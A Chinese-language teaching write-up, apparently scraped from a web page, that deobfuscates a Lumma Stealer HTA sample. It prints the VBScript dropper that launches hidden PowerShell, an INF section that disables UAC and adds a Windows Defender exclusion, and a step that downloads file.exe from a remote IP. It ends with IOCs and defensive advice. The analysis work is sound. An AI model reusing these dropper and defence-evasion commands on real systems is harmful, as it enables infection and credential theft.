LummaStealer样本反混淆分析教学文档<\/h1>

1. 样本概述<\/h2>

Lumma Stealer<\/strong>是一款针对Windows系统的信息窃取类恶意软件，主要功能包括：<\/p>

窃取浏览器Cookies、密码<\/li>
窃取加密货币钱包信息<\/li>
收集系统敏感信息<\/li> <\/ul>
传播方式<\/strong>：<\/p>

钓鱼邮件<\/li>
恶意广告<\/li>
破解软件传播<\/li> <\/ul>
反检测技术<\/strong>：<\/p>

多层混淆<\/li>
反分析技术<\/li>
使用合法系统工具规避检测<\/li> <\/ul>
2. 样本初始分析<\/h2>
样本类型：HTA文件（HTML Application）<\/p>
2.1 初始代码分析<\/h3>
样本包含VBScript代码，主要结构如下：<\/p>
Function<\/span> Atq<\/span>(ByVal<\/span> knR) <\/span><\/span> ' 字符解码函数 <\/span><\/span><\/span><\/span>End<\/span> Function<\/span> <\/span><\/span> <\/span><\/span>Function<\/span> wPE<\/span>() <\/span><\/span> ' 主执行函数 <\/span><\/span><\/span><\/span>End<\/span> Function<\/span> <\/span><\/span> <\/span><\/span>Function<\/span> PvZ<\/span>(ByVal<\/span> xpT) <\/span><\/span> ' 类型检查函数 <\/span><\/span><\/span><\/span>End<\/span> Function<\/span> <\/span><\/span> <\/span><\/span>Function<\/span> NvV<\/span>(ByVal<\/span> objectType) <\/span><\/span> ' 对象创建函数 <\/span><\/span><\/span><\/span>End<\/span> Function<\/span> <\/span><\/span> <\/span><\/span>wPE() ' 执行主函数 <\/span><\/span><\/span><\/code><\/pre>2.2 关键函数解析<\/h3> Atq函数 - 字符解码<\/h4> Function<\/span> Atq<\/span>(ByVal<\/span> knR) <\/span><\/span> Dim<\/span> veG <\/span><\/span> Dim<\/span> oEj <\/span><\/span> oEj =<\/span> 595 <\/span><\/span> Dim<\/span> xpT <\/span><\/span> xpT =<\/span> PvZ(knR) <\/span><\/span> If<\/span> xpT =<\/span> 7000 +<\/span> 1204 Then<\/span> <\/span><\/span> For<\/span> Each<\/span> veG In<\/span> knR <\/span><\/span> Dim<\/span> hma <\/span><\/span> hma =<\/span> hma &<\/span> Chr(veG -<\/span> oEj) <\/span><\/span> Next<\/span> <\/span><\/span> End<\/span> If<\/span> <\/span><\/span> Atq =<\/span> hma <\/span><\/span>End<\/span> Function<\/span> <\/span><\/span><\/code><\/pre> 功能：将输入数组中的每个数字减去595后转换为ASCII字符<\/li> 示例输入：Array(682,710,694,709,700,707,711,641,678,699,696,703,703)<\/code><\/li> 输出：Wscript.Shell<\/code><\/li> <\/ul> NvV函数 - 对象创建<\/h4> Function<\/span> NvV<\/span>(ByVal<\/span> objectType) <\/span><\/span> Set<\/span> NvV =<\/span> CreateObject(objectType) <\/span><\/span>End<\/span> Function<\/span> <\/span><\/span><\/code><\/pre> 功能：创建指定类型的COM对象<\/li> <\/ul> wPE函数 - 主执行函数<\/h4> Function<\/span> wPE<\/span>() <\/span><\/span> Dim<\/span> knR <\/span><\/span> Dim<\/span> vUw <\/span><\/span> vUw =<\/span> "powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {\/c powershell.exe $osJBgA='AAAAAAAAAAAAAAAAAAAAAEDkJGhgMCEdtBzbOahoKRehXhniD6Hff\/36dUpdiWTEK5mOjG0myYWyHn9pUwFGqUDQgxSvwr1r1WxbRPlj\/yS+a8a1fXx2IdP4jjgjuQbyvkJcRKM4r3evegekIDjj11xRUGOIoyYkFF3b7Z2afFNrz0QCVQ+\/PMzSAWf+G0n1fIj6f6PTIGUZLhMtL+YwkP5YYbJIHwUg3utYZe4O3ZObIrkGVgaSiLlM0KdOAv7NRn6O9z0slWh3vO8VkU9rfCTdDLfruFj3QReyHQaly8BiO3Jxsk5M1ovtXti3dJ0tL2\/FWvQBDyHeHaFo7etja8SgFEye33WK7LMRu3h3J\/JPNg6soUG55ynOYB8b7wubU9SJw4JU8\/EiDgSCAUvypOs03yPv8v1xrm\/YpCd3WPTDbuywc6wygBR\/zzBbGCkPtKp4m44TlAp5yS8WjXAvv6nupWE4xKWGWBbp4vwvr\/wg88rtczEJ5gRnjGU2idWSgeYh8bBzY+jJFJUzUSO53qW5qaAKrLflKoNUJyjM44...'"<\/span> <\/span><\/span> Dim<\/span> xLy <\/span><\/span> Set<\/span> xLy =<\/span> NvV(Atq(Array(682,710,694,709,700,707,711,641,678,699,696,703,703))) <\/span><\/span> xLy.Run(vUw),0,true<\/span> <\/span><\/span> self.close() <\/span><\/span>End<\/span> Function<\/span> <\/span><\/span><\/code><\/pre> 创建Wscript.Shell对象<\/li> 执行隐藏的PowerShell命令<\/li> 关闭自身<\/li> <\/ul> 3. PowerShell载荷分析<\/h2> 3.1 初始PowerShell命令<\/h3> powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe'<\/span> -WindowStyle hidden -ArgumentList {\/c powershell.exe $osJBgA='AAAAAA...'<\/span>} <\/span><\/span><\/code><\/pre> 以隐藏窗口方式执行PowerShell<\/li> 包含大段Base64编码数据<\/li> <\/ul> 3.2 解密分析<\/h3> 解密参数：<\/p> 加密算法：AES<\/li> 模式：ECB<\/li> 填充：无填充(no padding)<\/li> 密钥：Base64编码<\/li> 解密数据：从第16字节开始<\/li> <\/ul> 解密步骤<\/strong>：<\/p> 提取Base64编码的加密数据<\/li> 使用AES-ECB解密<\/li> 处理解密后的数据：转换为十六进制<\/li> 去除尾部多余的00字节<\/li> 解压得到最终Payload<\/li> <\/ul> <\/li> <\/ol> 4. 最终Payload分析<\/h2> 4.1 主要功能组件<\/h3> WPIA.ConsoleUtils类<\/h4> Add-Type @" <\/span><\/span><\/span>using System; <\/span><\/span><\/span>using System.Runtime.InteropServices; <\/span><\/span><\/span>public class WPIA.ConsoleUtils { <\/span><\/span><\/span> [DllImport("<\/span>user32.dll")] <\/span><\/span><\/span><\/span> public<\/span> static<\/span> extern<\/span> IntPtr PostMessage(IntPtr hWnd, uint<\/span> Msg, IntPtr wParam, IntPtr lParam); <\/span><\/span> <\/span><\/span> public<\/span> const<\/span> uint<\/span> WM_CHAR = 0x0102<\/span>; <\/span><\/span>} <\/span><\/span>"@ <\/span><\/span><\/span><\/code><\/pre> 导入user32.dll的PostMessage函数<\/li> 定义WM_CHAR常量(0x0102)<\/li> <\/ul> Set-INFFile函数<\/h4> function<\/span> Set-INFFile { <\/span><\/span> param<\/span>( <\/span><\/span> [string]<\/span>$InfFile, <\/span><\/span> [string]<\/span>$InfContent <\/span><\/span> ) <\/span><\/span> # 创建INF文件<\/span> <\/span><\/span> New-Item -Path $InfFile -ItemType File -Force | Out-Null <\/span><\/span> # 写入内容<\/span> <\/span><\/span> $InfContent | Out-File -FilePath $InfFile -Encoding ASCII -Force <\/span><\/span>} <\/span><\/span><\/code><\/pre> 参数： $InfFile<\/code>: INF文件路径<\/li> $InfContent<\/code>: INF文件内容<\/li> <\/ul> <\/li> <\/ul> 创建的INF文件内容<\/strong>：<\/p> [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall] CustomDestination=CustInstDestSectionAllUsers RunPreSetupCommands=RunPreSetupCommandsSection [RunPreSetupCommandsSection] ; 关闭UAC reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" \/v EnableLUA \/t REG_DWORD \/d 0 \/f ; 修改Windows Defender排除规则 powershell -command "Add-MpPreference -ExclusionPath '%AppData%'" [CustInstDestSectionAllUsers] 49000=AllUserDirID,0 <\/code><\/pre> 功能：禁用UAC（用户账户控制）<\/li> 将%AppData%目录添加到Windows Defender排除列表<\/li> <\/ul> <\/li> <\/ul> 4.2 恶意行为<\/h3> 在%Temp%目录创建CMSTP.inf文件<\/li> 在%AppData%目录创建file.exe<\/li> 从远程服务器下载恶意文件： URL: http:\/\/24.144.70.95\/file.exe<\/code> (已失效)<\/li> 使用Net.WebClient下载<\/li> <\/ul> <\/li> 执行下载的恶意文件<\/li> <\/ol> 4.3 解码函数分析<\/h3> NUL函数<\/strong>：<\/p> 对两个编码数组进行解码<\/li> 解码结果：第一个数组：Net.WebClient<\/code><\/li> 第二个数组：http:\/\/24.144.70.95\/file.exe<\/code><\/li> <\/ul> <\/li> <\/ul> 5. IOC（威胁指标）<\/h2> 文件哈希<\/strong>：<\/p> MD5: f0d9ef8b557debe5d94338cc84c89bdc<\/code><\/li> SHA1: 54dda938d1b24b8c01cca42f468b1387<\/code><\/li> <\/ul> <\/li> 网络指标<\/strong>：<\/p> C2服务器: http:\/\/24.144.70.95\/file.exe<\/code><\/li> <\/ul> <\/li> <\/ul> 6. 防御建议<\/h2> 用户教育<\/strong>：<\/p> 不要打开来源不明的HTA文件<\/li> 警惕钓鱼邮件和恶意广告<\/li> <\/ul> <\/li> 系统加固<\/strong>：<\/p> 保持UAC启用状态<\/li> 定期检查Windows Defender排除列表<\/li> <\/ul> <\/li> 检测规则<\/strong>：<\/p> 监控%Temp%和%AppData%目录下的可疑文件创建<\/li> 检测CMSTP.inf等可疑INF文件<\/li> 监控PowerShell的隐藏执行<\/li> <\/ul> <\/li> 企业防护<\/strong>：<\/p> 实施应用程序白名单<\/li> 限制PowerShell执行权限<\/li> 部署EDR解决方案监控可疑行为<\/li> <\/ul> <\/li> <\/ol> 7. 分析工具推荐<\/h2> 静态分析<\/strong>：<\/p> HTA文件分析：oledump.py<\/code><\/li> 脚本反混淆：CyberChef<\/code><\/li> <\/ul> <\/li> 动态分析<\/strong>：<\/p> 沙箱：Any.Run<\/code>, Cuckoo Sandbox<\/code><\/li> 行为监控：Process Monitor<\/code>, Process Hacker<\/code><\/li> <\/ul> <\/li> 网络分析<\/strong>：<\/p> Wireshark<\/li> Fiddler<\/li> <\/ul> <\/li> 内存分析<\/strong>：<\/p> Volatility<\/li> Rekall<\/li> <\/ul> <\/li> <\/ol>

LummaStealer样本反混淆分析教学文档<\/h1>

2. 样本初始分析<\/h2> 样本类型：HTA文件（HTML Application）<\/p>

2.2 关键函数解析<\/h3>

3. PowerShell载荷分析<\/h2>

4. 最终Payload分析<\/h2>

4.1 主要功能组件<\/h3>

2. 样本初始分析<\/h2>
样本类型：HTA文件（HTML Application）<\/p>